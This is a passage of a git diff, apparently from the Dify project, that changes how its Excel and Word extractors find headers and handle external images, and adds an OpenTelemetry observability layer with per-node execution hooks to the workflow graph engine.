in df.iterrows(): page_content = [] - for k, v in row.items(): + for k, v in series_row.items(): if pd.notna(v): page_content.append(f'"{k}":"{v}"') documents.append( @@ -75,3 +87,61 @@ class ExcelExtractor(BaseExtractor): raise ValueError(f"Unsupported file extension: {file_extension}") return documents + + def _find_header_and_columns(self, sheet, scan_rows=10) -> tuple[int, dict[int, str], int]: + """ + Scan first N rows to find the most likely header row. + Returns: + header_row_idx: 1-based index of the header row + column_map: Dict mapping 0-based column index to column name + max_col_idx: 1-based index of the last valid column (for iter_rows boundary) + """ + # Store potential candidates: (row_index, non_empty_count, column_map) + candidates: list[Candidate] = [] + + # Limit scan to avoid performance issues on huge files + # We iterate manually to control the read scope + for current_row_idx, row in enumerate(sheet.iter_rows(min_row=1, max_row=scan_rows, values_only=True), start=1): + # Filter out empty cells and build a temp map for this row + # col_idx is 0-based + row_map = {} + for col_idx, cell_value in enumerate(row): + if cell_value is not None and str(cell_value).strip(): + row_map[col_idx] = str(cell_value).strip().replace('"', '\\"') + + if not row_map: + continue + + non_empty_count = len(row_map) + + # Header selection heuristic (implemented): + # - Prefer the first row with at least 2 non-empty columns. + # - Fallback: choose the row with the most non-empty columns + # (tie-breaker: smaller row index). + candidates.append({"idx": current_row_idx, "count": non_empty_count, "map": row_map}) + + if not candidates: + return 0, {}, 0 + + # Choose the best candidate header row. + + best_candidate: Candidate | None = None + + # Strategy: prefer the first row with >= 2 non-empty columns; otherwise fallback. + + for cand in candidates: + if cand["count"] >= 2: + best_candidate = cand + break + + # Fallback: if no row has >= 2 columns, or all have 1, just take the one with max columns + if not best_candidate: + # Sort by count desc, then index asc + candidates.sort(key=lambda x: (-x["count"], x["idx"])) + best_candidate = candidates[0] + + # Determine max_col_idx (1-based for openpyxl) + # It is the index of the last valid column in our map + 1 + max_col_idx = max(best_candidate["map"].keys()) + 1 + + return best_candidate["idx"], best_candidate["map"], max_col_idx diff --git a/api/core/rag/extractor/extract_processor.py b/api/core/rag/extractor/extract_processor.py index 0f62f9c4b6..013c287248 100644 --- a/api/core/rag/extractor/extract_processor.py +++ b/api/core/rag/extractor/extract_processor.py @@ -166,7 +166,7 @@ class ExtractProcessor: elif extract_setting.datasource_type == DatasourceType.NOTION: assert extract_setting.notion_info is not None, "notion_info is required" extractor = NotionExtractor( - notion_workspace_id=extract_setting.notion_info.notion_workspace_id, + notion_workspace_id=extract_setting.notion_info.notion_workspace_id or "", notion_obj_id=extract_setting.notion_info.notion_obj_id, notion_page_type=extract_setting.notion_info.notion_page_type, document_model=extract_setting.notion_info.document, diff --git a/api/core/rag/extractor/helpers.py b/api/core/rag/extractor/helpers.py index 5166c0c768..5b466b281c 100644 --- a/api/core/rag/extractor/helpers.py +++ b/api/core/rag/extractor/helpers.py @@ -45,6 +45,6 @@ def detect_file_encodings(file_path: str, timeout: int = 5, sample_size: int = 1 except concurrent.futures.TimeoutError: raise TimeoutError(f"Timeout reached while detecting encoding for {file_path}") - if all(encoding["encoding"] is None for encoding in encodings): + if all(encoding.encoding is None for encoding in encodings): raise RuntimeError(f"Could not detect encoding for {file_path}") - return [FileEncoding(**enc) for enc in encodings if enc["encoding"] is not None] + return [enc for enc in encodings if enc.encoding is not None] diff --git a/api/core/rag/extractor/word_extractor.py b/api/core/rag/extractor/word_extractor.py index c7a5568866..044b118635 100644 --- a/api/core/rag/extractor/word_extractor.py +++ b/api/core/rag/extractor/word_extractor.py @@ -84,22 +84,45 @@ class WordExtractor(BaseExtractor): image_count = 0 image_map = {} - for rel in doc.part.rels.values(): + for r_id, rel in doc.part.rels.items(): if "image" in rel.target_ref: image_count += 1 if rel.is_external: url = rel.target_ref - response = ssrf_proxy.get(url) + if not self._is_valid_url(url): + continue + try: + response = ssrf_proxy.get(url) + except Exception as e: + logger.warning("Failed to download image from URL: %s: %s", url, str(e)) + continue if response.status_code == 200: - image_ext = mimetypes.guess_extension(response.headers["Content-Type"]) + image_ext = mimetypes.guess_extension(response.headers.get("Content-Type", "")) if image_ext is None: continue file_uuid = str(uuid.uuid4()) - file_key = "image_files/" + self.tenant_id + "/" + file_uuid + "." + image_ext + file_key = "image_files/" + self.tenant_id + "/" + file_uuid + image_ext mime_type, _ = mimetypes.guess_type(file_key) storage.save(file_key, response.content) - else: - continue + # save file to db + upload_file = UploadFile( + tenant_id=self.tenant_id, + storage_type=dify_config.STORAGE_TYPE, + key=file_key, + name=file_key, + size=0, + extension=str(image_ext), + mime_type=mime_type or "", + created_by=self.user_id, + created_by_role=CreatorUserRole.ACCOUNT, + created_at=naive_utc_now(), + used=True, + used_by=self.user_id, + used_at=naive_utc_now(), + ) + db.session.add(upload_file) + # Use r_id as key for external images since target_part is undefined + image_map[r_id] = f"![image]({dify_config.FILES_URL}/files/{upload_file.id}/file-preview)" else: image_ext = rel.target_ref.split(".")[-1] if image_ext is None: @@ -110,27 +133,28 @@ class WordExtractor(BaseExtractor): mime_type, _ = mimetypes.guess_type(file_key) storage.save(file_key, rel.target_part.blob) - # save file to db - upload_file = UploadFile( - tenant_id=self.tenant_id, - storage_type=dify_config.STORAGE_TYPE, - key=file_key, - name=file_key, - size=0, - extension=str(image_ext), - mime_type=mime_type or "", - created_by=self.user_id, - created_by_role=CreatorUserRole.ACCOUNT, - created_at=naive_utc_now(), - used=True, - used_by=self.user_id, - used_at=naive_utc_now(), - ) - - db.session.add(upload_file) - db.session.commit() - image_map[rel.target_part] = f"![image]({dify_config.FILES_URL}/files/{upload_file.id}/file-preview)" - + # save file to db + upload_file = UploadFile( + tenant_id=self.tenant_id, + storage_type=dify_config.STORAGE_TYPE, + key=file_key, + name=file_key, + size=0, + extension=str(image_ext), + mime_type=mime_type or "", + created_by=self.user_id, + created_by_role=CreatorUserRole.ACCOUNT, + created_at=naive_utc_now(), + used=True, + used_by=self.user_id, + used_at=naive_utc_now(), + ) + db.session.add(upload_file) + # Use target_part as key for internal images + image_map[rel.target_part] = ( + f"![image]({dify_config.FILES_URL}/files/{upload_file.id}/file-preview)" + ) + db.session.commit() return image_map def _table_to_markdown(self, table, image_map): @@ -186,11 +210,17 @@ class WordExtractor(BaseExtractor): image_id = blip.get("{http://schemas.openxmlformats.org/officeDocument/2006/relationships}embed") if not image_id: continue - image_part = paragraph.part.rels[image_id].target_part - - if image_part in image_map: - image_link = image_map[image_part] - paragraph_content.append(image_link) + rel = paragraph.part.rels.get(image_id) + if rel is None: + continue + # For external images, use image_id as key; for internal, use target_part + if rel.is_external: + if image_id in image_map: + paragraph_content.append(image_map[image_id]) + else: + image_part = rel.target_part + if image_part in image_map: + paragraph_content.append(image_map[image_part]) else: paragraph_content.append(run.text) return "".join(paragraph_content).strip() @@ -227,6 +257,18 @@ class WordExtractor(BaseExtractor): def parse_paragraph(paragraph): paragraph_content = [] + + def append_image_link(image_id, has_drawing): + """Helper to append image link from image_map based on relationship type.""" + rel = doc.part.rels[image_id] + if rel.is_external: + if image_id in image_map and not has_drawing: + paragraph_content.append(image_map[image_id]) + else: + image_part = rel.target_part + if image_part in image_map and not has_drawing: + paragraph_content.append(image_map[image_part]) + for run in paragraph.runs: if hasattr(run.element, "tag") and isinstance(run.element.tag, str) and run.element.tag.endswith("r"): # Process drawing type images @@ -243,10 +285,18 @@ class WordExtractor(BaseExtractor): "{http://schemas.openxmlformats.org/officeDocument/2006/relationships}embed" ) if embed_id: - image_part = doc.part.related_parts.get(embed_id) - if image_part in image_map: - has_drawing = True - paragraph_content.append(image_map[image_part]) + rel = doc.part.rels.get(embed_id) + if rel is not None and rel.is_external: + # External image: use embed_id as key + if embed_id in image_map: + has_drawing = True + paragraph_content.append(image_map[embed_id]) + else: + # Internal image: use target_part as key + image_part = doc.part.related_parts.get(embed_id) + if image_part in image_map: + has_drawing = True + paragraph_content.append(image_map[image_part]) # Process pict type images shape_elements = run.element.findall( ".//{http://schemas.openxmlformats.org/wordprocessingml/2006/main}pict" @@ -261,9 +311,7 @@ class WordExtractor(BaseExtractor): "{http://schemas.openxmlformats.org/officeDocument/2006/relationships}id" ) if image_id and image_id in doc.part.rels: - image_part = doc.part.rels[image_id].target_part - if image_part in image_map and not has_drawing: - paragraph_content.append(image_map[image_part]) + append_image_link(image_id, has_drawing) # Find imagedata element in VML image_data = shape.find(".//{urn:schemas-microsoft-com:vml}imagedata") if image_data is not None: @@ -271,9 +319,7 @@ class WordExtractor(BaseExtractor): "{http://schemas.openxmlformats.org/officeDocument/2006/relationships}id" ) if image_id and image_id in doc.part.rels: - image_part = doc.part.rels[image_id].target_part - if image_part in image_map and not has_drawing: - paragraph_content.append(image_map[image_part]) + append_image_link(image_id, has_drawing) if run.text.strip(): paragraph_content.append(run.text.strip()) return "".join(paragraph_content) if paragraph_content else "" diff --git a/api/core/rag/index_processor/constant/built_in_field.py b/api/core/rag/index_processor/constant/built_in_field.py index 9ad69e7fe3..7c270a32d0 100644 --- a/api/core/rag/index_processor/constant/built_in_field.py +++ b/api/core/rag/index_processor/constant/built_in_field.py @@ -15,3 +15,4 @@ class MetadataDataSource(StrEnum): notion_import = "notion" local_file = "file_upload" online_document = "online_document" + online_drive = "online_drive" diff --git a/api/core/rag/splitter/fixed_text_splitter.py b/api/core/rag/splitter/fixed_text_splitter.py index 801d2a2a52..b65cb14d8e 100644 --- a/api/core/rag/splitter/fixed_text_splitter.py +++ b/api/core/rag/splitter/fixed_text_splitter.py @@ -2,6 +2,7 @@ from __future__ import annotations +import codecs import re from typing import Any @@ -52,7 +53,7 @@ class FixedRecursiveCharacterTextSplitter(EnhanceRecursiveCharacterTextSplitter) def __init__(self, fixed_separator: str = "\n\n", separators: list[str] | None = None, **kwargs: Any): """Create a new TextSplitter.""" super().__init__(**kwargs) - self._fixed_separator = fixed_separator + self._fixed_separator = codecs.decode(fixed_separator, "unicode_escape") self._separators = separators or ["\n\n", "\n", "。", ". ", " ", ""] def split_text(self, text: str) -> list[str]: @@ -94,7 +95,8 @@ class FixedRecursiveCharacterTextSplitter(EnhanceRecursiveCharacterTextSplitter) splits = re.split(r" +", text) else: splits = text.split(separator) - splits = [item + separator if i < len(splits) else item for i, item in enumerate(splits)] + if self._keep_separator: + splits = [s + separator for s in splits[:-1]] + splits[-1:] else: splits = list(text) if separator == "\n": @@ -103,7 +105,7 @@ class FixedRecursiveCharacterTextSplitter(EnhanceRecursiveCharacterTextSplitter) splits = [s for s in splits if (s not in {"", "\n"})] _good_splits = [] _good_splits_lengths = [] # cache the lengths of the splits - _separator = separator if self._keep_separator else "" + _separator = "" if self._keep_separator else separator s_lens = self._length_function(splits) if separator != "": for s, s_len in zip(splits, s_lens): diff --git a/api/core/tools/errors.py b/api/core/tools/errors.py index b0c2232857..e4afe24426 100644 --- a/api/core/tools/errors.py +++ b/api/core/tools/errors.py @@ -29,6 +29,10 @@ class ToolApiSchemaError(ValueError): pass +class ToolSSRFError(ValueError): + pass + + class ToolCredentialPolicyViolationError(ValueError): pass diff --git a/api/core/tools/utils/message_transformer.py b/api/core/tools/utils/message_transformer.py index ca2aa39861..df322eda1c 100644 --- a/api/core/tools/utils/message_transformer.py +++ b/api/core/tools/utils/message_transformer.py @@ -101,6 +101,8 @@ class ToolFileMessageTransformer: meta = message.meta or {} mimetype = meta.get("mime_type", "application/octet-stream") + if not mimetype: + mimetype = "application/octet-stream" # get filename from meta filename = meta.get("filename", None) # if message is str, encode it to bytes diff --git a/api/core/tools/utils/parser.py b/api/core/tools/utils/parser.py index 6eabde3991..3486182192 100644 --- a/api/core/tools/utils/parser.py +++ b/api/core/tools/utils/parser.py @@ -425,7 +425,7 @@ class ApiBasedToolSchemaParser: except ToolApiSchemaError as e: openapi_error = e - # openai parse error, fallback to swagger + # openapi parse error, fallback to swagger try: converted_swagger = ApiBasedToolSchemaParser.parse_swagger_to_openapi( loaded_content, extra_info=extra_info, warning=warning @@ -436,7 +436,6 @@ class ApiBasedToolSchemaParser: ), schema_type except ToolApiSchemaError as e: swagger_error = e - # swagger parse error, fallback to openai plugin try: openapi_plugin = ApiBasedToolSchemaParser.parse_openai_plugin_json_to_tool_bundle( diff --git a/api/core/workflow/graph_engine/graph_engine.py b/api/core/workflow/graph_engine/graph_engine.py index a4b2df2a8c..2e8b8f345f 100644 --- a/api/core/workflow/graph_engine/graph_engine.py +++ b/api/core/workflow/graph_engine/graph_engine.py @@ -140,6 +140,10 @@ class GraphEngine: pause_handler = PauseCommandHandler() self._command_processor.register_handler(PauseCommand, pause_handler) + # === Extensibility === + # Layers allow plugins to extend engine functionality + self._layers: list[GraphEngineLayer] = [] + # === Worker Pool Setup === # Capture Flask app context for worker threads flask_app: Flask | None = None @@ -158,6 +162,7 @@ class GraphEngine: ready_queue=self._ready_queue, event_queue=self._event_queue, graph=self._graph, + layers=self._layers, flask_app=flask_app, context_vars=context_vars, min_workers=self._min_workers, @@ -196,10 +201,6 @@ class GraphEngine: event_emitter=self._event_manager, ) - # === Extensibility === - # Layers allow plugins to extend engine functionality - self._layers: list[GraphEngineLayer] = [] - # === Validation === # Ensure all nodes share the same GraphRuntimeState instance self._validate_graph_state_consistency() diff --git a/api/core/workflow/graph_engine/layers/__init__.py b/api/core/workflow/graph_engine/layers/__init__.py index 0a29a52993..772433e48c 100644 --- a/api/core/workflow/graph_engine/layers/__init__.py +++ b/api/core/workflow/graph_engine/layers/__init__.py @@ -8,9 +8,11 @@ with middleware-like components that can observe events and interact with execut from .base import GraphEngineLayer from .debug_logging import DebugLoggingLayer from .execution_limits import ExecutionLimitsLayer +from .observability import ObservabilityLayer __all__ = [ "DebugLoggingLayer", "ExecutionLimitsLayer", "GraphEngineLayer", + "ObservabilityLayer", ] diff --git a/api/core/workflow/graph_engine/layers/base.py b/api/core/workflow/graph_engine/layers/base.py index 24c12c2934..780f92a0f4 100644 --- a/api/core/workflow/graph_engine/layers/base.py +++ b/api/core/workflow/graph_engine/layers/base.py @@ -9,6 +9,7 @@ from abc import ABC, abstractmethod from core.workflow.graph_engine.protocols.command_channel import CommandChannel from core.workflow.graph_events import GraphEngineEvent +from core.workflow.nodes.base.node import Node from core.workflow.runtime import ReadOnlyGraphRuntimeState @@ -83,3 +84,29 @@ class GraphEngineLayer(ABC): error: The exception that caused execution to fail, or None if successful """ pass + + def on_node_run_start(self, node: Node) -> None: # noqa: B027 + """ + Called immediately before a node begins execution. + + Layers can override to inject behavior (e.g., start spans) prior to node execution. + The node's execution ID is available via `node._node_execution_id` and will be + consistent with all events emitted by this node execution. + + Args: + node: The node instance about to be executed + """ + pass + + def on_node_run_end(self, node: Node, error: Exception | None) -> None: # noqa: B027 + """ + Called after a node finishes execution. + + The node's execution ID is available via `node._node_execution_id` and matches + the `id` field in all events emitted by this node execution. + + Args: + node: The node instance that just finished execution + error: Exception instance if the node failed, otherwise None + """ + pass diff --git a/api/core/workflow/graph_engine/layers/node_parsers.py b/api/core/workflow/graph_engine/layers/node_parsers.py new file mode 100644 index 0000000000..b6bac794df --- /dev/null +++ b/api/core/workflow/graph_engine/layers/node_parsers.py @@ -0,0 +1,61 @@ +""" +Node-level OpenTelemetry parser interfaces and defaults. +""" + +import json +from typing import Protocol + +from opentelemetry.trace import Span +from opentelemetry.trace.status import Status, StatusCode + +from core.workflow.nodes.base.node import Node +from core.workflow.nodes.tool.entities import ToolNodeData + + +class NodeOTelParser(Protocol): + """Parser interface for node-specific OpenTelemetry enrichment.""" + + def parse(self, *, node: Node, span: "Span", error: Exception | None) -> None: ... + + +class DefaultNodeOTelParser: + """Fallback parser used when no node-specific parser is registered.""" + + def parse(self, *, node: Node, span: "Span", error: Exception | None) -> None: + span.set_attribute("node.id", node.id) + if node.execution_id: + span.set_attribute("node.execution_id", node.execution_id) + if hasattr(node, "node_type") and node.node_type: + span.set_attribute("node.type", node.node_type.value) + + if error: + span.record_exception(error) + span.set_status(Status(StatusCode.ERROR, str(error))) + else: + span.set_status(Status(StatusCode.OK)) + + +class ToolNodeOTelParser: + """Parser for tool nodes that captures tool-specific metadata.""" + + def __init__(self) -> None: + self._delegate = DefaultNodeOTelParser() + + def parse(self, *, node: Node, span: "Span", error: Exception | None) -> None: + self._delegate.parse(node=node, span=span, error=error) + + tool_data = getattr(node, "_node_data", None) + if not isinstance(tool_data, ToolNodeData): + return + + span.set_attribute("tool.provider.id", tool_data.provider_id) + span.set_attribute("tool.provider.type", tool_data.provider_type.value) + span.set_attribute("tool.provider.name", tool_data.provider_name) + span.set_attribute("tool.name", tool_data.tool_name) + span.set_attribute("tool.label", tool_data.tool_label) + if tool_data.plugin_unique_identifier: + span.set_attribute("tool.plugin.id", tool_data.plugin_unique_identifier) + if tool_data.credential_id: + span.set_attribute("tool.credential.id", tool_data.credential_id) + if tool_data.tool_configurations: + span.set_attribute("tool.config", json.dumps(tool_data.tool_configurations, ensure_ascii=False)) diff --git a/api/core/workflow/graph_engine/layers/observability.py b/api/core/workflow/graph_engine/layers/observability.py new file mode 100644 index 0000000000..a674816884 --- /dev/null +++ b/api/core/workflow/graph_engine/layers/observability.py @@ -0,0 +1,169 @@ +""" +Observability layer for GraphEngine. + +This layer creates OpenTelemetry spans for node execution, enabling distributed +tracing of workflow execution. It establishes OTel context during node execution +so that automatic instrumentation (HTTP requests, DB queries, etc.) automatically +associates with the node span. +""" + +import logging +from dataclasses import dataclass +from typing import cast, final + +from opentelemetry import context as context_api +from opentelemetry.trace import Span, SpanKind, Tracer, get_tracer, set_span_in_context +from typing_extensions import override + +from configs import dify_config +from core.workflow.enums import NodeType +from core.workflow.graph_engine.layers.base import GraphEngineLayer +from core.workflow.graph_engine.layers.node_parsers import ( + DefaultNodeOTelParser, + NodeOTelParser, + ToolNodeOTelParser, +) +from core.workflow.nodes.base.node import Node +from extensions.otel.runtime import is_instrument_flag_enabled + +logger = logging.getLogger(__name__) + + +@dataclass(slots=True) +class _NodeSpanContext: + span: "Span" + token: object + + +@final +class ObservabilityLayer(GraphEngineLayer): + """ + Layer that creates OpenTelemetry spans for node execution. + + This layer: + - Creates a span when a node starts execution + - Establishes OTel context so automatic instrumentation associates with the span + - Sets complete attributes and status when node execution ends + """ + + def __init__(self) -> None: + super().__init__() + self._node_contexts: dict[str, _NodeSpanContext] = {} + self._parsers: dict[NodeType, NodeOTelParser] = {} + self._default_parser: NodeOTelParser = cast(NodeOTelParser, DefaultNodeOTelParser()) + self._is_disabled: bool = False + self._tracer: Tracer | None = None + self._build_parser_registry() + self._init_tracer() + + def _init_tracer(self) -> None: + """Initialize OpenTelemetry tracer in constructor.""" + if not (dify_config.ENABLE_OTEL or is_instrument_flag_enabled()): + self._is_disabled = True + return + + try: + self._tracer = get_tracer(__name__) + except Exception as e: + logger.warning("Failed to get OpenTelemetry tracer: %s", e) + self._is_disabled = True + + def _build_parser_registry(self) -> None: + """Initialize parser registry for node types.""" + self._parsers = { + NodeType.TOOL: ToolNodeOTelParser(), + } + + def _get_parser(self, node: Node) -> NodeOTelParser: + node_type = getattr(node, "node_type", None) + if isinstance(node_type, NodeType): + return self._parsers.get(node_type, self._default_parser) + return self._default_parser + + @override + def on_graph_start(self) -> None: + """Called when graph execution starts.""" + self._node_contexts.clear() + + @override + def on_node_run_start(self, node: Node) -> None: + """ + Called when a node starts execution. + + Creates a span and establishes OTel context for automatic instrumentation. + """ + if self._is_disabled: + return + + try: + if not self._tracer: + return + + execution_id = node.execution_id + if not execution_id: + return + + parent_context = context_api.get_current() + span = self._tracer.start_span( + f"{node.title}", + kind=SpanKind.INTERNAL, + context=parent_context, + ) + + new_context = set_span_in_context(span) + token = context_api.attach(new_context) + + self._node_contexts[execution_id] = _NodeSpanContext(span=span, token=token) + + except Exception as e: + logger.warning("Failed to create OpenTelemetry span for node %s: %s", node.id, e) + + @override + def on_node_run_end(self, node: Node, error: Exception | None) -> None: + """ + Called when a node finishes execution. + + Sets complete attributes, records exceptions, and ends the span. + """ + if self._is_disabled: + return + + try: + execution_id = node.execution_id + if not execution_id: + return + node_context = self._node_contexts.get(execution_id) + if not node_context: + return + + span = node_context.span + parser = self._get_parser(node) + try: + parser.parse(node=node, span=span, error=error) + span.end() + finally: + token = node_context.token + if token is not None: + try: + context_api.detach(token) + except Exception: + logger.warning("Failed to detach OpenTelemetry token: %s", token) + self._node_contexts.pop(execution_id, None) + + except Exception as e: + logger.warning("Failed to end OpenTelemetry span for node %s: %s", node.id, e) + + @override + def on_event(self, event) -> None: + """Not used in this layer.""" + pass + + @override + def on_graph_end(self, error: Exception | None) -> None: + """Called when graph execution ends.""" + if self._node_contexts: + logger.warning( + "ObservabilityLayer: %d node spans were not properly ended", + len(self._node_contexts), + ) + self._node_contexts.clear() diff --git a/api/core/workflow/graph_engine/worker.py b/api/core/workflow/graph_engine/worker.py index 73e59ee298..e37a08ae47 100644 --- a/api/core/workflow/graph_engine/worker.py +++ b/api/core/workflow/graph_engine/worker.py @@ -9,6 +9,7 @@ import contextvars import queue import threading import time +from collections.abc import Sequence from datetime import datetime from typing import final from uuid import uuid4 @@ -17,6 +18,7 @@ from flask import Flask from typing_extensions import override from core.workflow.graph import Graph +from core.workflow.graph_engine.layers.base import GraphEngineLayer from core.workflow.graph_events import GraphNodeEventBase, NodeRunFailedEvent from core.workflow.nodes.base.node import Node from libs.flask_utils import preserve_flask_contexts @@ -39,6 +41,7 @@ class Worker(threading.Thread): ready_queue: ReadyQueue, event_queue: queue.Queue[GraphNodeEventBase], graph: Graph, + layers: Sequence[GraphEngineLayer], worker_id: int = 0, flask_app: Flask | None = None, context_vars: contextvars.Context | None = None, @@ -50,6 +53,7 @@ class Worker(threading.Thread): ready_queue: Ready queue containing node IDs ready for execution event_queue: Queue for pushing execution events graph: Graph containing nodes to execute + layers: Graph engine layers for node execution hooks worker_id: Unique identifier for this worker flask_app: Optional Flask application for context preservation context_vars: Optional context variables to preserve in worker thread @@ -63,6 +67,7 @@ class Worker(threading.Thread): self._context_vars = context_vars self._stop_event = threading.Event() self._last_task_time = time.time() + self._layers = layers if layers is not None else [] def stop(self) -> None: """Signal the worker to stop processing.""" @@ -122,20 +127,51 @@ class Worker(threading.Thread): Args: node: The node instance to execute """ - # Execute the node with preserved context if Flask app is provided + node.ensure_execution_id() + + error: Exception | None = None + if self._flask_app and self._context_vars: with preserve_flask_contexts( flask_app=self._flask_app, context_vars=self._context_vars, ): - # Execute the node + self._invoke_node_run_start_hooks(node) + try: + node_events = node.run() + for event in node_events: + self._event_queue.put(event) + except Exception as exc: + error = exc + raise + finally: + self._invoke_node_run_end_hooks(node, error) + else: + self._invoke_node_run_start_hooks(node) + try: node_events = node.run() for event in node_events: - # Forward event to dispatcher immediately for streaming self._event_queue.put(event) - else: - # Execute without context preservation - node_events = node.run() - for event in node_events: - # Forward event to dispatcher immediately for streaming - self._event_queue.put(event) + except Exception as exc: + error = exc + raise + finally: + self._invoke_node_run_end_hooks(node, error) + + def _invoke_node_run_start_hooks(self, node: Node) -> None: + """Invoke on_node_run_start hooks for all layers.""" + for layer in self._layers: + try: + layer.on_node_run_start(node) + except Exception: + # Silently ignore layer errors to prevent disrupting node execution + continue + + def _invoke_node_run_end_hooks(self, node: Node, error: Exception | None) -> None: + """Invoke on_node_run_end hooks for all layers.""" + for layer in self._layers: + try: + layer.on_node_run_end(node, error) + except Exception: + # Silently ignore layer errors to prevent disrupting node execution + continue diff --git a/api/core/workflow/graph_engine/worker_management/worker_pool.py b/api/core/workflow/graph_engine/worker_management/worker_pool.py index a9aada9ea5..5b9234586b 100644 --- a/api/core/workflow/graph_engine/worker_management/worker_pool.py +++ b/api/core/workflow/graph_engine/worker_management/worker_pool.py @@ -14,6 +14,7 @@ from configs import dify_config from core.workflow.graph import Graph from core.workflow.graph_events import GraphNodeEventBase +from ..layers.base import GraphEngineLayer from ..ready_queue import ReadyQueue from ..worker import Worker @@ -39,6 +40,7 @@ class WorkerPool: ready_queue: ReadyQueue, event_queue: queue.Queue[GraphNodeEventBase], graph: Graph, + layers: list[GraphEngineLayer], flask_app: "Flask | None" = None, context_vars: "Context | None" = None, min_workers: int | None = None, @@ -53,6 +55,7 @@ class WorkerPool: ready_queue: Ready queue for nodes ready for execution event_queue: Queue for worker events graph: The workflow graph + layers: Graph engine layers for node execution hooks flask_app: Optional Flask app for context preservation context_vars: Optional context variables min_workers: Minimum number of workers @@ -65,6 +68,7 @@ class WorkerPool: self._graph = graph self._flask_app = flask_app self._context_vars = context_vars + self._layers = layers # Scaling parameters with defaults self._min_workers = min_workers or dify_config.GRAPH_ENGINE_MIN_WORKERS @@ -144,6 +148,7 @@ class WorkerPool: ready_queue=self._ready_queue, event_queue=self._event_queue, graph=self._graph, + layers=self._layers, worker_id=worker_id, flask_app=self._flask_app, context_vars=self._context_vars, diff --git a/api/core/workflow/nodes/base/node.py b/api/core/workflow/nodes/base/node.py index c2e1105971..8ebba3659c 100644 --- a/api/core/workflow/nodes/base/node.py +++ b/api/core/workflow/nodes/base/node.py @@ -244,6 +244,15 @@ class Node(Generic[NodeDataT]): def graph_init_params(self) -> "GraphInitParams": return self._graph_init_params + @property + def execution_id(self) -> str: + return self._node_execution_id + + def ensure_execution_id(self) -> str: + if not self._node_execution_id: + self._node_execution_id = str(uuid4()) + return self._node_execution_id + def _hydrate_node_data(self, data: Mapping[str, Any]) -> NodeDataT: return cast(NodeDataT, self._node_data_type.model_validate(data)) @@ -256,14 +265,12 @@ class Node(Generic[NodeDataT]): raise NotImplementedError def run(self) -> Generator[GraphNodeEventBase, None, None]: - # Generate a single node execution ID to use for all events - if not self._node_execution_id: - self._node_execution_id = str(uuid4()) + execution_id = self.ensure_execution_id() self._start_at = naive_utc_now() # Create and push start event with required fields start_event = NodeRunStartedEvent( - id=self._node_execution_id, + id=execution_id, node_id=self._node_id, node_type=self.node_type, node_title=self.title, @@ -321,7 +328,7 @@ class Node(Generic[NodeDataT]): if isinstance(event, NodeEventBase): # pyright: ignore[reportUnnecessaryIsInstance] yield self._dispatch(event) elif isinstance(event, GraphNodeEventBase) and not event.in_iteration_id and not event.in_loop_id: # pyright: ignore[reportUnnecessaryIsInstance] - event.id = self._node_execution_id + event.id = self.execution_id yield event else: yield event @@ -333,7 +340,7 @@ class Node(Generic[NodeDataT]): error_type="WorkflowNodeError", ) yield NodeRunFailedEvent( - id=self._node_execution_id, + id=self.execution_id, node_id=self._node_id, node_type=self.node_type, start_at=self._start_at, @@ -512,7 +519,7 @@ class Node(Generic[NodeDataT]): match result.status: case WorkflowNodeExecutionStatus.FAILED: return NodeRunFailedEvent( - id=self._node_execution_id, + id=self.execution_id, node_id=self.id, node_type=self.node_type, start_at=self._start_at, @@ -521,7 +528,7 @@ class Node(Generic[NodeDataT]): ) case WorkflowNodeExecutionStatus.SUCCEEDED: return NodeRunSucceededEvent( - id=self._node_execution_id, + id=self.execution_id, node_id=self.id, node_type=self.node_type, start_at=self._start_at, @@ -537,7 +544,7 @@ class Node(Generic[NodeDataT]): @_dispatch.register def _(self, event: StreamChunkEvent) -> NodeRunStreamChunkEvent: return NodeRunStreamChunkEvent( - id=self._node_execution_id, + id=self.execution_id, node_id=self._node_id, node_type=self.node_type, selector=event.selector, @@ -550,7 +557,7 @@ class Node(Generic[NodeDataT]): match event.node_run_result.status: case WorkflowNodeExecutionStatus.SUCCEEDED: return NodeRunSucceededEvent( - id=self._node_execution_id, + id=self.execution_id, node_id=self._node_id, node_type=self.node_type, start_at=self._start_at, @@ -558,7 +565,7 @@ class Node(Generic[NodeDataT]): ) case WorkflowNodeExecutionStatus.FAILED: return NodeRunFailedEvent( - id=self._node_execution_id, + id=self.execution_id, node_id=self._node_id, node_type=self.node_type, start_at=self._start_at, @@ -573,7 +580,7 @@ class Node(Generic[NodeDataT]): @_dispatch.register def _(self, event: PauseRequestedEvent) -> NodeRunPauseRequestedEvent: return NodeRunPauseRequestedEvent( - id=self._node_execution_id, + id=self.execution_id, node_id=self._node_id, node_type=self.node_type, node_run_result=NodeRunResult(status=WorkflowNodeExecutionStatus.PAUSED), @@ -583,7 +590,7 @@ class Node(Generic[NodeDataT]): @_dispatch.register def _(self, event: AgentLogEvent) -> NodeRunAgentLogEvent: return NodeRunAgentLogEvent( - id=self._node_execution_id, + id=self.execution_id, node_id=self._node_id, node_type=self.node_type, message_id=event.message_id, @@ -599,7 +606,7 @@ class Node(Generic[NodeDataT]): @_dispatch.register def _(self, event: LoopStartedEvent) -> NodeRunLoopStartedEvent: return NodeRunLoopStartedEvent( - id=self._node_execution_id, + id=self.execution_id, node_id=self._node_id, node_type=self.node_type, node_title=self.node_data.title, @@ -612,7 +619,7 @@ class Node(Generic[NodeDataT]): @_dispatch.register def _(self, event: LoopNextEvent) -> NodeRunLoopNextEvent: return NodeRunLoopNextEvent( - id=self._node_execution_id, + id=self.execution_id, node_id=self._node_id, node_type=self.node_type, node_title=self.node_data.title, @@ -623,7 +630,7 @@ class Node(Generic[NodeDataT]): @_dispatch.register def _(self, event: LoopSucceededEvent) -> NodeRunLoopSucceededEvent: return NodeRunLoopSucceededEvent( - id=self._node_execution_id, + id=self.execution_id, node_id=self._node_id, node_type=self.node_type, node_title=self.node_data.title, @@ -637,7 +644,7 @@ class Node(Generic[NodeDataT]): @_dispatch.register def _(self, event: LoopFailedEvent) -> NodeRunLoopFailedEvent: return NodeRunLoopFailedEvent( - id=self._node_execution_id, + id=self.execution_id, node_id=self._node_id, node_type=self.node_type, node_title=self.node_data.title, @@ -652,7 +659,7 @@ class Node(Generic[NodeDataT]): @_dispatch.register def _(self, event: IterationStartedEvent) -> NodeRunIterationStartedEvent: return NodeRunIterationStartedEvent( - id=self._node_execution_id, + id=self.execution_id, node_id=self._node_id, node_type=self.node_type, node_title=self.node_data.title, @@ -665,7 +672,7 @@ class Node(Generic[NodeDataT]): @_dispatch.register def _(self, event: IterationNextEvent) -> NodeRunIterationNextEvent: return 